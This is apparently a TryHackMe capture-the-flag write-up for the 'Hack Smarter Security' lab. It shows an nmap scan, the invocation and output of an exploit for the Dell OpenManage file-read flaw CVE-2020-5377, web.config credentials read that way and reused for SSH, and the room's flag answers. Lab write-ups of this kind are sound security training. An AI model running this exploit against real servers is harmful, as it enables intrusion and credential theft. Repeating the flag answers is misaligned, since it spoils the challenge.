TryHackMe: Hack Smarter Security | Q&A
Your mission is to infiltrate the web server of the notorious Hack Smarter APT (Advanced Persistent Threat) group. This group is known for conducting malicious cyber activities, and it’s imperative that we gather intel on their upcoming targets.
LINK: Hack Smarter Security
Enumeration
nmap -sV -sC -T4 10.10.136.190
Starting Nmap 7.80 ( https://nmap.org ) at 2024-07-14 14:49 EEST
Nmap scan report for 10.10.136.190
Host is up (0.47s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
|_06-28-23 03:00PM 1022126 stolen-passport.png
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
| 256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_ 256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HackSmarterSec
1311/tcp open ssl/rxmon?
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Not valid before: 2023-06-30T19:03:17
|_Not valid after: 2025-06-29T19:03:17
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HACKSMARTERSEC
| NetBIOS_Domain_Name: HACKSMARTERSEC
| NetBIOS_Computer_Name: HACKSMARTERSEC
| DNS_Domain_Name: hacksmartersec
| DNS_Computer_Name: hacksmartersec
| Product_Version: 10.0.17763
|_ System_Time: 2024-07-14T11:50:24+00:00
| ssl-cert: Subject: commonName=hacksmartersec
| Not valid before: 2024-07-13T11:29:18
|_Not valid after: 2025-01-12T11:29:18
|_ssl-date: 2024-07-14T11:50:35+00:00; -1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.92 secondsThe scan revealed that our target is a Windows machine, and we found 5 open ports.
We also discovered that FTP anonymous login was enabled but didn’t find anything useful in the files.
Moving on, we checked the website running on port 80, which turned out to be IIS 10.0. However, our attempts to find interesting files or directories were unsuccessful.
Moving on, we checked port 1311 where we found Dell OpenManage version 9.4.0.2 running.
- After digging deeper, we learned that this version was vulnerable to CVE-2020–5377, known as
Arbitrary File Read. - I found this exploit that will help us read files on the target.
- A quick search reveals that the root folder for the IIS default website is located at
C:\inetpub\wwwroot. the idea here is to try to read theweb.configfile which is an XML file containing rules for a particular on the web server. this file may contains credentials.
python3 CVE-2020–5377.py <attacker IP> <target IP>:<target port>Flags :
based on the title of the webserver on port 80 which is hacksmartersec, i assumed that the web.config file is located at C:/inetpub\wwwroot\hacksmartersec\web.config.
# python3 CVE-2020-5377.py <attacker IP> <target IP>:<target port>
Session: 899463F99DD6BFF20E8FDE06E7F53860
VID:
1E24CB0C500059F5
10.10.57.249:1311
file > C:\inetpub\wwwroot\HackSmarterSec\web.config
Reading contents of C:\inetpub\wwwroot\HackSmarterSec\web.config:
<configuration>
<appSettings>
<add key="Username" value="tyler" />
<add key="Password" value="IAmA1337h4x0randIknowit!" />
</appSettings>
<location path="web.config">
<system.webServer>
<security>
<authorization>
<deny users="*"
</authorization>
</security>
</system.webServer>
</location>
</configuration>Now we have the credentials so our next step is to login via ssh and get the user flag.
ssh Login credentials :
Username : tyler
Password : IAmA1337h4x0randIknowit!Q : What is user.txt?
A: THM{4ll15n0tw3llw1thd3ll}
Q : Which organizations is the Hack Smarter group targeting next?
A : CyberLens, WorkSmarter, SteelMountain
